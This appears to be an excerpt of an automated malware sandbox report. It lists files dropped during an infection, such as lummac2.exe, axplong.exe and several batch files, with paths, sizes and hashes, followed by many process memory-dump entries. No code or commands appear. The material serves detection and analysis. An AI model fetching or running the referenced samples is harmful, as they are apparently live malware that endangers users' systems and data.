C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
9345d44a4103cf05a75ac73e6b5b7f39

SHA1
83bfc53742c037ae47b3988ad2c9e0b597cfb0a0

SHA256
b3fef132c6d5cd538b7af326287acc90d7d5081525a4d188a9dd9f92511c3799

SHA512
bf9582a28031eb7ed5cb4442de8ff19b6eff29bac9041c1b4e290fdaea2b2d4105a7c6001b5a65abd5f12e5703f38c21a20351d882d58dffa27fda6d256bcf79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7355f4a1d4e1a2519a4a60ee11f1d192

SHA1
8802bbb71f3e8947c02a7d835b31c7abf4289780

SHA256
2fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3

SHA512
7186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6d35322e3c2f8397eba8a34c6949b8bb

SHA1
aa5a7c25e187958914d07891c2cad5c60bf8b07b

SHA256
f0847952b26167264cb51c57e6d8d0babc4892e287f23832de65428f8fdeacb9

SHA512
c357e3d424b2671d0cd0bd7728512c631fba41e178b2436179743be564b8f7c5a7e3fb1e6432a2b6dfbdbdd2f9f7d2f09736d628c2e43c0be8d02b47c1606a75

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
Filesize
297KB

MD5
5d860e52bfa60fec84b6a46661b45246

SHA1
1259e9f868d0d80ac09aadb9387662347cd4bd68

SHA256
b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30

SHA512
04ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe
Filesize
218KB

MD5
d80bb65fe6aa18cc152a957eec8acfaa

SHA1
b7fe6c68644aa5ec7641fa0c15dd9f5a00c9869b

SHA256
5c2ab349bff2012fc64be9e71010c9852250e3b8aa5b71229a6e30e7e1ba8dc2

SHA512
ead0b903092a722606fc08d7e05e210ae6d3003bb4c794ec2dd89164a7369df890c99bded1dcec50fd61059ad7ee96bdaae863a4fa1e1820901f90f0b4d4bb39

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe
Filesize
2.5MB

MD5
ffada57f998ed6a72b6ba2f072d2690a

SHA1
6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f

SHA256
677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12

SHA512
1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
Filesize
522KB

MD5
70a578f7f58456e475facd69469cf20a

SHA1
83e147e7ba01fa074b2f046b65978f838f7b1e8e

SHA256
5c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a

SHA512
707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
Filesize
310KB

MD5
6e3d83935c7a0810f75dfa9badc3f199

SHA1
9f7d7c0ea662bcdca9b0cda928dc339f06ef0730

SHA256
dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed

SHA512
9f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
Filesize
415KB

MD5
07101cac5b9477ba636cd8ca7b9932cb

SHA1
59ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1

SHA256
488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77

SHA512
02240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
Filesize
154KB

MD5
5f331887bec34f51cca7ea78815621f7

SHA1
2eb81490dd3a74aca55e45495fa162b31bcb79e7

SHA256
d7ab2f309ee99f6545c9e1d86166740047965dd8172aec5f0038753c9ff5e9d8

SHA512
7a66c5d043139a3b20814ac65110f8151cf652e3f9d959489781fdaea33e9f53ce9fd1992f1a32bff73380c7d9ef47200d8b924a8adf415e7a93421d62eb054d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
Filesize
659KB

MD5
bbd06263062b2c536b5caacdd5f81b76

SHA1
c38352c1c08fb0fa5e67a079998ef30ebc962089

SHA256
1875275da8d576fd9962c5b2bd9fe0e4b4d188caad9549125c8a64ecaf9308c9

SHA512
7faa4e18cc9d7d82cb8efe8494668e05f75ddd5a8c9c9a058b2246a786a60d7761168862220b70820b02f38f196cfb5f106db36cdcfd5a5a3f9dfd01654eb9ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
Filesize
5.8MB

MD5
6c149b39619395a8ba117a4cae95ba6f

SHA1
3ef8be98589745ecce5522dd871e813f69a7b71b

SHA256
c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8

SHA512
866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\6.exe
Filesize
4.8MB

MD5
5bb3677a298d7977d73c2d47b805b9c3

SHA1
91933eb9b40281e59dd7e73d8b7dac77c5e42798

SHA256
85eb3f6ba52fe0fd232f8c3371d87f7d363f821953c344936ab87728ba6a627f

SHA512
d20f862e9fadb5ad12eddaae8c6ebbfa03d67d35c5ca272e185206eb256cd6a89c338ce608c992df715d36a3f1624a507dbe324a057bd412b87438f4a008f33d

Download Submit
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
Filesize
1.8MB

MD5
2e70b996132ba5d2caae18bc7479fd8c

SHA1
4569cc7318cc3cf4496f5293df0e5c4430b1c696

SHA256
c5771e7388a105f3ae8b92cfc68144c2f391b51c75a0f4731652eff483af04da

SHA512
2cccfc7adb6d653497037d8742dd47cd4969445e277db1791df0c70a0a06b60a05c663f5001ec4cbbf8f845f7a01ff8d81f0451680791f2140640eebc33266f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ins.bat
Filesize
1KB

MD5
0be4cbfa51fe5f8010e78553a28f2779

SHA1
ae21783c148ae1443fa87a43b9b51cb0ab1a799b

SHA256
cc56d197270cdf7c3b5c193ec5b3c63dd87b57b58f90571649f8f0e29a6f1a90

SHA512
337a332eecb12cb065a09b3ae01e86802082c576b203ffd1a8270c69172036dc244ecffad1fba3de76d573c77f1315821a563d2a4aed73bfeb9e9bdf6107edfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qnaiedbd.4nd.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.bat
Filesize
568B

MD5
e861a08036b9eb5f216deb58e8a7934d

SHA1
5f12dd049df2f88d95f205a4adc307df78ac16ee

SHA256
e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb

SHA512
7ea2fd3b085bd4b3e27d4dda36e079ec8910173cc2b33ccd06698051eb7d5f2818ed9000761d1fc44e354c06d015feb16e77958dab8a3969a0cee2fd453ca0c9

Download Submit
\??\pipe\LOCAL\crashpad_2560_SDFEYXMTDGJSKLTB
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/372-141-0x00000246F2B30000-0x00000246F2B52000-memory.dmp

Filesize
136KB

Download
memory/468-228-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/812-582-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/812-584-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-585-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-589-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-167-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-549-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-464-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-539-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-21-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-586-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-587-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-538-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-588-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-556-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-18-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-19-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-257-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-259-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-258-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-20-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-314-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-537-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1564-302-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/1644-45-0x0000000006160000-0x0000000006778000-memory.dmp

Filesize
6.1MB

Download
memory/1644-46-0x0000000005420000-0x000000000552A000-memory.dmp

Filesize
1.0MB

Download
memory/1644-150-0x0000000005C10000-0x0000000005C76000-memory.dmp

Filesize
408KB

Download
memory/1644-40-0x000000007369E000-0x000000007369F000-memory.dmp

Filesize
4KB

Download
memory/1644-41-0x0000000000570000-0x00000000005C0000-memory.dmp

Filesize
320KB

Download
memory/1644-42-0x0000000005590000-0x0000000005B36000-memory.dmp

Filesize
5.6MB

Download
memory/1644-43-0x0000000005080000-0x0000000005112000-memory.dmp

Filesize
584KB

Download
memory/1644-44-0x0000000005210000-0x000000000521A000-memory.dmp

Filesize
40KB

Download
memory/1644-256-0x0000000007FE0000-0x0000000008030000-memory.dmp

Filesize
320KB

Download
memory/1644-49-0x00000000053B0000-0x00000000053FC000-memory.dmp

Filesize
304KB

Download
memory/1644-48-0x0000000005370000-0x00000000053AC000-memory.dmp

Filesize
240KB

Download
memory/1644-47-0x0000000005310000-0x0000000005322000-memory.dmp

Filesize
72KB

Download
memory/2456-66-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2668-65-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/2668-67-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/2940-294-0x00000000007F0000-0x00000000007F1000-memory.dmp

Filesize
4KB

Download
memory/2940-295-0x0000000000CA0000-0x00000000014BE000-memory.dmp

Filesize
8.1MB

Download
memory/3284-0-0x0000000000E50000-0x0000000001316000-memory.dmp

Filesize
4.8MB

Download
memory/3284-3-0x0000000000E50000-0x0000000001316000-memory.dmp

Filesize
4.8MB

Download
memory/3284-1-0x0000000077CD6000-0x0000000077CD8000-memory.dmp

Filesize
8KB

Download
memory/3284-5-0x0000000000E50000-0x0000000001316000-memory.dmp

Filesize
4.8MB

Download
memory/3284-17-0x0000000000E50000-0x0000000001316000-memory.dmp

Filesize
4.8MB

Download
memory/3284-2-0x0000000000E51000-0x0000000000E7F000-memory.dmp

Filesize
184KB

Download
memory/3828-458-0x00007FF7124C0000-0x00007FF712AF6000-memory.dmp

Filesize
6.2MB

Download
memory/3828-307-0x00007FF7124C0000-0x00007FF712AF6000-memory.dmp

Filesize
6.2MB

Download
memory/4488-521-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4488-515-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4488-514-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4488-518-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4488-517-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4488-516-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4824-166-0x0000000000400000-0x0000000000470000-memory.dmp

Filesize
448KB

Download
memory/4824-237-0x0000000009E40000-0x000000000A002000-memory.dmp

Filesize
1.8MB

Download
memory/4824-227-0x00000000093B0000-0x00000000093CE000-memory.dmp

Filesize
120KB

Download
memory/4824-226-0x0000000009430000-0x00000000094A6000-memory.dmp

Filesize
472KB

Download
memory/4824-238-0x000000000A540000-0x000000000AA6C000-memory.dmp

Filesize
5.2MB

Download
memory/5220-531-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-535-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-522-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-529-0x0000000000DE0000-0x0000000000E00000-memory.dmp

Filesize
128KB

Download
memory/5220-528-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-527-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-536-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-534-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-533-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-532-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-530-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-525-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-526-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-524-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5220-523-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5456-361-0x000001F4324B0000-0x000001F4324BA000-memory.dmp

Filesize
40KB

Download
memory/5456-360-0x000001F4324D0000-0x000001F4324E2000-memory.dmp

Filesize
72KB

Download
memory/5472-505-0x000001A8765F0000-0x000001A8765FA000-memory.dmp

Filesize
40KB

Download
memory/5472-508-0x000001A876840000-0x000001A87685A000-memory.dmp

Filesize
104KB

Download
memory/5472-507-0x000001A8767E0000-0x000001A8767EA000-memory.dmp

Filesize
40KB

Download
memory/5472-506-0x000001A876800000-0x000001A87681C000-memory.dmp

Filesize
112KB

Download
memory/5472-511-0x000001A876830000-0x000001A87683A000-memory.dmp

Filesize
40KB

Download
memory/5472-495-0x000001A876620000-0x000001A8766D3000-memory.dmp

Filesize
716KB

Download
memory/5472-494-0x000001A876600000-0x000001A87661C000-memory.dmp

Filesize
112KB

Download
memory/5472-509-0x000001A8767F0000-0x000001A8767F8000-memory.dmp

Filesize
32KB

Download
memory/5472-510-0x000001A876820000-0x000001A876826000-memory.dmp

Filesize
24KB

Download
memory/6040-459-0x0000000000B40000-0x0000000000B96000-memory.dmp

Filesize
344KB

Download
memory/6040-457-0x0000000000B40000-0x0000000000B96000-memory.dmp

Filesize
344KB

Download
memory/6096-463-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download
memory/6096-461-0x0000000000BA0000-0x0000000001066000-memory.dmp

Filesize
4.8MB

Download